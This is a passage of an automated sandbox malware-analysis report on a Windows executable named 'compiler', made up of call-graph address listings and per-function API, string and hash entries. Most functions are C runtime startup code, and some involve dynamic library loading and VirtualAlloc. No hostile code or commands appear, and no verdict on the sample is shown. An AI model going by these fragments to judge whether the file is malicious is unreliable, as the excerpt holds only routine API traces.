61254->61255 61258 7ff7badc4cab pre_c_initialization 61254->61258 61256 7ff7bada9b44 _get_daylight 14 API calls 61255->61256 61256->61250 61257 7ff7badc4ce8 61257->61250 61321 7ff7badc46ec 23 API calls 5 library calls 61257->61321 61258->61257 61320 7ff7badb76b0 14 API calls 2 library calls 61258->61320 61262->61223 61263->61234 61264->61224 61265->61235 61266->61234 61267->61241 61268->61224 61278 7ff7bada930c EnterCriticalSection LeaveCriticalSection FindHandler 61269->61278 61271 7ff7badb6d81 61272 7ff7badb6d90 61271->61272 61279 7ff7bada935c 26 API calls 4 library calls 61271->61279 61274 7ff7badb6d99 IsProcessorFeaturePresent 61272->61274 61277 7ff7badb6dc3 FindHandler 61272->61277 61275 7ff7badb6da8 61274->61275 61280 7ff7badb6e5c 6 API calls 2 library calls 61275->61280 61278->61271 61279->61272 61280->61277 61282 7ff7badc4d83 61281->61282 61283 7ff7badc4d8d 61282->61283 61322 7ff7badb75c8 EnterCriticalSection 61282->61322 61285 7ff7badc4dff 61283->61285 61288 7ff7badb6d78 FindHandler 26 API calls 61283->61288 61285->61245 61289 7ff7badc4e17 61288->61289 61291 7ff7badc4e6a 61289->61291 61293 7ff7badb91cc pre_c_initialization 26 API calls 61289->61293 61291->61245 61294 7ff7badc4e54 61293->61294 61295 7ff7badc4b9c pre_c_initialization 37 API calls 61294->61295 61295->61291 61323 7ff7bad92530 61296->61323 61299 7ff7badc48da 61301 7ff7badc48ef 61299->61301 61302 7ff7badc48df GetACP 61299->61302 61300 7ff7badc48c8 GetOEMCP 61300->61301 61301->61248 61303 7ff7badb89e8 61301->61303 61302->61301 61304 7ff7badb8a33 61303->61304 61308 7ff7badb89f7 wcsftime 61303->61308 61306 7ff7bada9b44 _get_daylight 14 API calls 61304->61306 61305 7ff7badb8a1a RtlAllocateHeap 61307 7ff7badb8a31 61305->61307 61305->61308 61306->61307 61307->61250 61310 7ff7badc4e94 61307->61310 61308->61304 61308->61305 61368 7ff7badc8e60 EnterCriticalSection LeaveCriticalSection wcsftime 61308->61368 61311 7ff7badc48a8 pre_c_initialization 28 API calls 61310->61311 61313 7ff7badc4ebf 61311->61313 
61312 7ff7badc4f3f pre_c_initialization __scrt_fastfail __FrameHandler3::UnwindNestedFrames 61312->61254 61313->61312 61314 7ff7badc4efc IsValidCodePage 61313->61314 61314->61312 61315 7ff7badc4f0d 61314->61315 61316 7ff7badc4f44 GetCPInfo 61315->61316 61318 7ff7badc4f16 __scrt_fastfail 61315->61318 61316->61312 61316->61318 61369 7ff7badc49b8 61318->61369 61319->61248 61320->61257 61321->61250 61324 7ff7bad92554 61323->61324 61330 7ff7bad9254f 61323->61330 61324->61330 61331 7ff7badb90f8 GetLastError 61324->61331 61328 7ff7bad92592 61359 7ff7badb93d4 26 API calls TranslateName 61328->61359 61330->61299 61330->61300 61332 7ff7badb911a 61331->61332 61336 7ff7badb911f 61331->61336 61360 7ff7badb7bfc 6 API calls try_get_function 61332->61360 61335 7ff7badb9142 61337 7ff7badb9127 SetLastError 61335->61337 61338 7ff7badb7638 pre_c_initialization 14 API calls 61335->61338 61336->61337 61361 7ff7badb7c44 6 API calls try_get_function 61336->61361 61341 7ff7badb91c6 61337->61341 61342 7ff7bad9256f 61337->61342 61340 7ff7badb9155 61338->61340 61343 7ff7badb9173 61340->61343 61344 7ff7badb9163 61340->61344 61345 7ff7badb6d78 FindHandler 24 API calls 61341->61345 61358 7ff7badb93a0 26 API calls TranslateName 61342->61358 61364 7ff7badb7c44 6 API calls try_get_function 61343->61364 61362 7ff7badb7c44 6 API calls try_get_function 61344->61362 61347 7ff7badb91cb 61345->61347 61349 7ff7badb916a 61363 7ff7badb76b0 14 API calls 2 library calls 61349->61363 61350 7ff7badb917b 61351 7ff7badb9191 61350->61351 61352 7ff7badb917f 61350->61352 61366 7ff7badb8ea8 14 API calls _invalid_parameter_noinfo 61351->61366 61365 7ff7badb7c44 6 API calls try_get_function 61352->61365 61356 7ff7badb9199 61367 7ff7badb76b0 14 API calls 2 library calls 61356->61367 61358->61328 61359->61330 61361->61335 61362->61349 61363->61337 61364->61350 61365->61349 61366->61356 61367->61337 61368->61308 61370 7ff7badc49f5 GetCPInfo 61369->61370 61377 7ff7badc4aed __FrameHandler3::UnwindNestedFrames 61369->61377 
61374 7ff7badc4a08 61370->61374 61370->61377 61372 7ff7badc4a81 61391 7ff7badc99ac 61372->61391 61378 7ff7badc7370 61374->61378 61376 7ff7badc99ac pre_c_initialization 31 API calls 61376->61377 61377->61312 61379 7ff7bad92530 TranslateName 26 API calls 61378->61379 61380 7ff7badc73b2 61379->61380 61396 7ff7badc1470 61380->61396 61382 7ff7badc73e8 61383 7ff7badb89e8 wcsftime 15 API calls 61382->61383 61384 7ff7badc73ef __FrameHandler3::UnwindNestedFrames 61382->61384 61385 7ff7badc7414 __scrt_fastfail wcsftime 61382->61385 61383->61385 61384->61372 61386 7ff7badc1470 _Wcsftime MultiByteToWideChar 61385->61386 61387 7ff7badc74ac 61385->61387 61388 7ff7badc748e 61386->61388 61387->61384 61389 7ff7badb76b0 __free_lconv_num 14 API calls 61387->61389 61388->61387 61390 7ff7badc7492 GetStringTypeW 61388->61390 61389->61384 61390->61387 61392 7ff7bad92530 TranslateName 26 API calls 61391->61392 61393 7ff7badc99d1 61392->61393 61399 7ff7badc9694 61393->61399 61395 7ff7badc4ab4 61395->61376 61397 7ff7badc1478 MultiByteToWideChar 61396->61397 61400 7ff7badc96d6 pre_c_initialization 61399->61400 61401 7ff7badc1470 _Wcsftime MultiByteToWideChar 61400->61401 61403 7ff7badc9720 61401->61403 61402 7ff7badc995f __FrameHandler3::UnwindNestedFrames 61402->61395 61403->61402 61404 7ff7badb89e8 wcsftime 15 API calls 61403->61404 61405 7ff7badc9753 wcsftime 61403->61405 61404->61405 61406 7ff7badc1470 _Wcsftime MultiByteToWideChar 61405->61406 61408 7ff7badc9857 61405->61408 61407 7ff7badc97c5 61406->61407 61407->61408 61425 7ff7badb8058 61407->61425 61408->61402 61437 7ff7badb76b0 14 API calls 2 library calls 61408->61437 61412 7ff7badc9814 61412->61408 61415 7ff7badb8058 __crtLCMapStringW 7 API calls 61412->61415 61413 7ff7badc9866 61414 7ff7badc9880 wcsftime 61413->61414 61416 7ff7badb89e8 wcsftime 15 API calls 61413->61416 61414->61408 61417 7ff7badb8058 __crtLCMapStringW 7 API calls 61414->61417 61415->61408 61416->61414 61419 7ff7badc9901 61417->61419 61418 7ff7badc9936 
61418->61408 61436 7ff7badb76b0 14 API calls 2 library calls 61418->61436 61419->61418 61433 7ff7badc14cc 61419->61433 61438 7ff7badb7794 61425->61438 61428 7ff7badb80ed 61448 7ff7badb8134 5 API calls 2 library calls 61428->61448 61429 7ff7badb809b LCMapStringEx 61430 7ff7badb811f 61429->61430 61430->61408 61430->61412 61430->61413 61432 7ff7badb80f7 LCMapStringW 61432->61430 61434 7ff7badc14e8 WideCharToMultiByte 61433->61434 61436->61408 61437->61402 61439 7ff7badb77f0 try_get_function 61438->61439 61440 7ff7badb77f5 61438->61440 61439->61440 61441 7ff7badb7824 LoadLibraryW 61439->61441 61445 7ff7badb78bd FreeLibrary 61439->61445 61446 7ff7badb78d8 61439->61446 61447 7ff7badb787f LoadLibraryExW 61439->61447 61440->61428 61440->61429 61441->61439 61442 7ff7badb7845 GetLastError 61441->61442 61442->61439 61443 7ff7badb78e6 GetProcAddress 61444 7ff7badb78f7 61443->61444 61444->61440 61445->61439 61446->61440 61446->61443 61447->61439 61448->61432 61449->61205 61450 7ff7bad34a01 61451 7ff7bad34a30 61450->61451 61452 7ff7bad34a0c 61450->61452 61452->61451 61454 7ff7bad3d1ec 61452->61454 61455 7ff7bada9b44 _get_daylight 14 API calls 61454->61455 61456 7ff7bad3d20b GetLastError 61455->61456 61457 7ff7bad3d25e 61456->61457 61458 7ff7bad3d28d 61457->61458 61459 7ff7bad45880 89 API calls 61457->61459 61466 7ff7bad3d2bc _cwprintf_s_l 61458->61466 61468 7ff7bad3cddc 20 API calls __FrameHandler3::UnwindNestedFrames 61458->61468 61459->61458 61460 7ff7bad3d361 61462 7ff7bada9b44 _get_daylight 14 API calls 61460->61462 61464 7ff7bad3d366 SetLastError 61462->61464 61467 7ff7bad3d326 61466->61467 61469 7ff7bad3cddc 20 API calls __FrameHandler3::UnwindNestedFrames 61466->61469 61467->61460 61470 7ff7bad3cddc 20 API calls __FrameHandler3::UnwindNestedFrames 61467->61470 61468->61466 61469->61467 61470->61460 61471 7ff7bad8bf68 61498 7ff7bad8c12c 61471->61498 61474 7ff7bad8c0b4 61538 7ff7bad8c4b4 7 API calls __scrt_fastfail 61474->61538 61475 7ff7bad8bf84 __scrt_acquire_startup_lock 
61477 7ff7bad8c0be 61475->61477 61479 7ff7bad8bfa2 61475->61479 61539 7ff7bad8c4b4 7 API calls __scrt_fastfail 61477->61539 61489 7ff7bad8bfe4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 61479->61489 61506 7ff7badb5264 61479->61506 61482 7ff7bad8bfc7 61483 7ff7bad8c0c9 _cwprintf_s_l FindHandler 61485 7ff7bad8c04d 61514 7ff7bad8c600 61485->61514 61487 7ff7bad8c052 61517 7ff7badb5190 61487->61517 61489->61485 61535 7ff7bada9a44 26 API calls FindHandler 61489->61535 61495 7ff7bad8c075 61495->61483 61537 7ff7bad8c310 8 API calls 2 library calls 61495->61537 61497 7ff7bad8c08c 61497->61482 61499 7ff7bad8c14e __scrt_initialize_crt 61498->61499 61540 7ff7bad8d770 61499->61540 61505 7ff7bad8bf7c 61505->61474 61505->61475 61507 7ff7badb5277 61506->61507 61508 7ff7bad8bfc3 61507->61508 61591 7ff7bad8be84 61507->61591 61508->61482 61510 7ff7badb5200 61508->61510 61511 7ff7badb524f 61510->61511 61512 7ff7badb5235 61510->61512 61511->61489 61512->61511 61673 7ff7bad8bf4c 61512->61673 61681 7ff7bad8cbb0 61514->61681 61518 7ff7badc4e18 pre_c_initialization 37 API calls 61517->61518 61519 7ff7badb519f 61518->61519 61520 7ff7bad8c05a 61519->61520 61683 7ff7badc5150 26 API calls TranslateName 61519->61683 61522 7ff7bad350e0 61520->61522 61523 7ff7bad350eb 61522->61523 61684 7ff7bad3e350 61523->61684 61526 7ff7bad383c7 61687 7ff7bad3ab80 61526->61687 61527 7ff7bad383b6 61703 7ff7bad38174 60 API calls vwscanf_s 61527->61703 61534 7ff7bad383c2 61536 7ff7bad8c644 GetModuleHandleW 61534->61536 61535->61485 61536->61495 61537->61497 61538->61477 61539->61483 61541 7ff7bad8d779 __vcrt_initialize_winapi_thunks __vcrt_initialize 61540->61541 61555 7ff7bad8d9ec 61541->61555 61544 7ff7bad8c153 61544->61505 61548 7ff7badb6c90 61544->61548 61546 7ff7bad8d790 61546->61544 61562 7ff7bad8da34 DeleteCriticalSection 61546->61562 61549 7ff7badc8d9c 61548->61549 61550 7ff7bad8c160 61549->61550 61551 7ff7badc4d60 37 API calls 61549->61551 61553 7ff7badc4e18 37 API calls 
61549->61553 61579 7ff7badb8678 61549->61579 61550->61505 61554 7ff7bad8d7a4 8 API calls 3 library calls 61550->61554 61551->61549 61553->61549 61554->61505 61556 7ff7bad8d9f4 61555->61556 61558 7ff7bad8da25 61556->61558 61559 7ff7bad8d783 61556->61559 61563 7ff7bad8dd70 61556->61563 61568 7ff7bad8da34 DeleteCriticalSection 61558->61568 61559->61544 61561 7ff7bad8d8f4 8 API calls 3 library calls 61559->61561 61561->61546 61562->61544 61569 7ff7bad8da6c 61563->61569 61566 7ff7bad8ddb0 61566->61556 61567 7ff7bad8ddbb InitializeCriticalSectionAndSpinCount 61567->61566 61568->61559 61570 7ff7bad8dacd 61569->61570 61574 7ff7bad8dac8 try_get_function 61569->61574 61570->61566 61570->61567 61571 7ff7bad8dafc LoadLibraryExW 61572 7ff7bad8db1d GetLastError 61571->61572 61571->61574 61572->61574 61573 7ff7bad8dbbe GetProcAddress 61576 7ff7bad8dbcf 61573->61576 61574->61570 61574->61571 61575 7ff7bad8dbb0 61574->61575 61577 7ff7bad8db95 FreeLibrary 61574->61577 61578 7ff7bad8db57 LoadLibraryExW 61574->61578 61575->61570 61575->61573 61576->61570 61577->61574 61578->61574 61590 7ff7badb75c8 EnterCriticalSection 61579->61590 61581 7ff7badb8688 61582 7ff7badc57e8 24 API calls 61581->61582 61583 7ff7badb8691 61582->61583 61584 7ff7badb847c 26 API calls 61583->61584 61589 7ff7badb869f 61583->61589 61586 7ff7badb869a 61584->61586 61585 7ff7badb761c _isindst LeaveCriticalSection 61587 7ff7badb86ab 61585->61587 61588 7ff7badb856c GetStdHandle GetFileType 61586->61588 61587->61549 61588->61589 61589->61585 61592 7ff7bad8be94 pre_c_initialization 61591->61592 61608 7ff7badb52d4 61592->61608 61594 7ff7bad8bea0 pre_c_initialization 61614 7ff7bad8c178 61594->61614 61596 7ff7bad8beb9 _RTC_Initialize 61606 7ff7bad8bf0e pre_c_initialization 61596->61606 61619 7ff7bad8c38c 61596->61619 61598 7ff7bad8bf3a __scrt_initialize_default_local_stdio_options 61598->61507 61600 7ff7bad8bece pre_c_initialization 61622 7ff7badb4cc8 61600->61622 61604 7ff7bad8bee3 pre_c_initialization 61605 7ff7badb593c 
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 59578552-0
                                                            • Opcode ID: c929f4e4c52116a57e7616fe210febb9697bb72e3a0dbf161af8a0ea1499aaf3
                                                            • Instruction ID: 3def1bd9c2d39b7a1ebf25ae5019e742d923dc652e10af420863253fcdd9fe14
                                                            • Opcode Fuzzy Hash: c929f4e4c52116a57e7616fe210febb9697bb72e3a0dbf161af8a0ea1499aaf3
                                                            • Instruction Fuzzy Hash: 43E0BF21E1D20292FA18777D48421BC9091DF76310FE002B5EB1D456CECD3D64525631
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: __scrt_fastfail__scrt_is_nonwritable_in_current_image$__scrt_acquire_startup_lock__scrt_get_show_window_mode__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                            • String ID:
                                                            • API String ID: 1664584033-0
                                                            • Opcode ID: 03eb6b14f1faf7f4670637568bd0667e55731e7767f39476883028e821a64beb
                                                            • Instruction ID: dd5fd1664ec37ecc7eebc11e5d6aa608a9bcf4928569b9318a5e746ee9e0be1b
                                                            • Opcode Fuzzy Hash: 03eb6b14f1faf7f4670637568bd0667e55731e7767f39476883028e821a64beb
                                                            • Instruction Fuzzy Hash: F0313D10E0C20785FA14BB6C945A3BAA280EF73784FC454B5EF0E4B2DFDE2DB5458261
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                            • String ID:
                                                            • API String ID: 1330151763-0
                                                            • Opcode ID: 5d9e04e0c033c60789675486a423cd353925c34ff20c017513265b0d4d37ee32
                                                            • Instruction ID: ae3e188066dfd0adcef4431c5fdc4bbef287b97bc2371ae4f55847ef449ca578
                                                            • Opcode Fuzzy Hash: 5d9e04e0c033c60789675486a423cd353925c34ff20c017513265b0d4d37ee32
                                                            • Instruction Fuzzy Hash: FDC1BE32B24A4196FB10EF68C4906AD7761FB9AB98B804679DF2E4779CDF38D051C350
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: ac296493bf1d68606dd17f0184959cac14ad6e10368896e64cc43297ccf6545d
                                                            • Instruction ID: 7b5942cf8aa4a2d4f84cc137e87447dbf88eae99e6b711d0dcb3d114e53d26c5
                                                            • Opcode Fuzzy Hash: ac296493bf1d68606dd17f0184959cac14ad6e10368896e64cc43297ccf6545d
                                                            • Instruction Fuzzy Hash: F2C1C122A08786A1FB61BB1D90442BDE6A1FBA6B80FC50171EF4E0379DDE7CE455C360
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _cwprintf_s_l
                                                            • String ID: cdata<%s>: %d$cdata<%s>: %p$ctype<%s>
                                                            • API String ID: 2941638530-613915905
                                                            • Opcode ID: 08d394e2e8320ac1b43fe76137978c90c43e74420b673c77cdc7302fc2bbc485
                                                            • Instruction ID: da711355e6deff520c1e32fb222d248516755193da4f4b9502bf98f3d3412fce
                                                            • Opcode Fuzzy Hash: 08d394e2e8320ac1b43fe76137978c90c43e74420b673c77cdc7302fc2bbc485
                                                            • Instruction Fuzzy Hash: 4DE1BB22B08A4582FB14BB1AD4503BCA3A0FB66B84F944176EF5D8779DDF3DE4528360
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • LoadLibraryExA.KERNELBASE(?,?,?,00007FF7BAD39E7B,?,?,?,?,?,?,00000000,?,?,00007FF7BAD3E360), ref: 00007FF7BAD46891
                                                            • GetProcAddressForCaller.KERNELBASE(?,?,?,00007FF7BAD39E7B,?,?,?,?,?,?,00000000,?,?,00007FF7BAD3E360), ref: 00007FF7BAD468AA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: AddressCallerLibraryLoadProc
                                                            • String ID: SystemFunction036$advapi32.dll
                                                            • API String ID: 4215043672-1354007664
                                                            • Opcode ID: 68472491d10acbd87ac19bde7c6dd0bbaf31ac41a68eb6f5cf41694a134f0d4b
                                                            • Instruction ID: 2f7068062b127d57cadf78891c4f8567294cda633f4b1537bf542e57ce211c0e
                                                            • Opcode Fuzzy Hash: 68472491d10acbd87ac19bde7c6dd0bbaf31ac41a68eb6f5cf41694a134f0d4b
                                                            • Instruction Fuzzy Hash: 9F111961A05B4281FF04BB19E445365A3A1EF7AB44FC408B4CE0E0A39CEE7CD49582A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: String$try_get_function
                                                            • String ID: LCMapStringEx
                                                            • API String ID: 1203122356-3893581201
                                                            • Opcode ID: 8a7a115700303e1bcef7722147143826319c5b99711f11308b318790f71eea05
                                                            • Instruction ID: cf0f93739605837e09bf4c5a58d621f46066fca9d9f435cdfc622118d5b4aad8
                                                            • Opcode Fuzzy Hash: 8a7a115700303e1bcef7722147143826319c5b99711f11308b318790f71eea05
                                                            • Instruction Fuzzy Hash: 5B111A32A08B8186E760EB09F4402AAB7A4F79AB94F944135EF8D43B1DDF3CD5508B40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastVirtual$FreeQuery
                                                            • String ID:
                                                            • API String ID: 2187276999-0
                                                            • Opcode ID: 08204fa2b3748c7be1f8c377aa6b35ea1f8be9d5e35c77a80b3059f6e634a443
                                                            • Instruction ID: 7c2e8ce8d714a81a2e3d266fafffb2b38aa66fb10a0f289c821fe69c960453b8
                                                            • Opcode Fuzzy Hash: 08204fa2b3748c7be1f8c377aa6b35ea1f8be9d5e35c77a80b3059f6e634a443
                                                            • Instruction Fuzzy Hash: 97112131B28B4241FA60BB19A40023EE7A0FB5ABD4F9845B5DF9D4269CDF3CD5548750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 585863094f20753905da77fae0c2c96fe1fe2c63e522e6c690d79830f8462474
                                                            • Instruction ID: 7dfd0a87a3a3028ee3441150f4d20b117e3f165f6732143d985e28773ebc2a59
                                                            • Opcode Fuzzy Hash: 585863094f20753905da77fae0c2c96fe1fe2c63e522e6c690d79830f8462474
                                                            • Instruction Fuzzy Hash: 99E04F60B0430152FB147B29988537D6262EFA6741FD098BCDF4F0335EDD3DE85982A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Graph of the function at 7ff7bad48638 (image not preserved); block 7ff7bad4865e-7ff7bad48697 calls GetLastError, VirtualAlloc and SetLastError.
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$AllocVirtual
                                                            • String ID:
                                                            • API String ID: 1225938287-0
                                                            • Opcode ID: e9b21f7a05337cf3fb1cf3c25e058ce6d924ddb4fb06cc0e3eeffff37cc4a889
                                                            • Instruction ID: 858c760cc9fe6a501897fc985f5b4d07aabcc44a82cc31dd8e2ca5a8c5c8d4c4
                                                            • Opcode Fuzzy Hash: e9b21f7a05337cf3fb1cf3c25e058ce6d924ddb4fb06cc0e3eeffff37cc4a889
                                                            • Instruction Fuzzy Hash: C811BCB2B15A8081EB14AB68E44436AB2A0F705BF4F908778CB7E07BDCDF28C5568340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00000000,00007FF7BAD4870D,?,?,00000000,00007FF7BAD39E9D,?,?,?,?,?,?,00000000), ref: 00007FF7BAD490FD
                                                            • VirtualAlloc.KERNELBASE(?,?,00000000,00007FF7BAD4870D,?,?,00000000,00007FF7BAD39E9D,?,?,?,?,?,?,00000000), ref: 00007FF7BAD49116
                                                            • SetLastError.KERNEL32(?,?,00000000,00007FF7BAD4870D,?,?,00000000,00007FF7BAD39E9D,?,?,?,?,?,?,00000000), ref: 00007FF7BAD49121
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
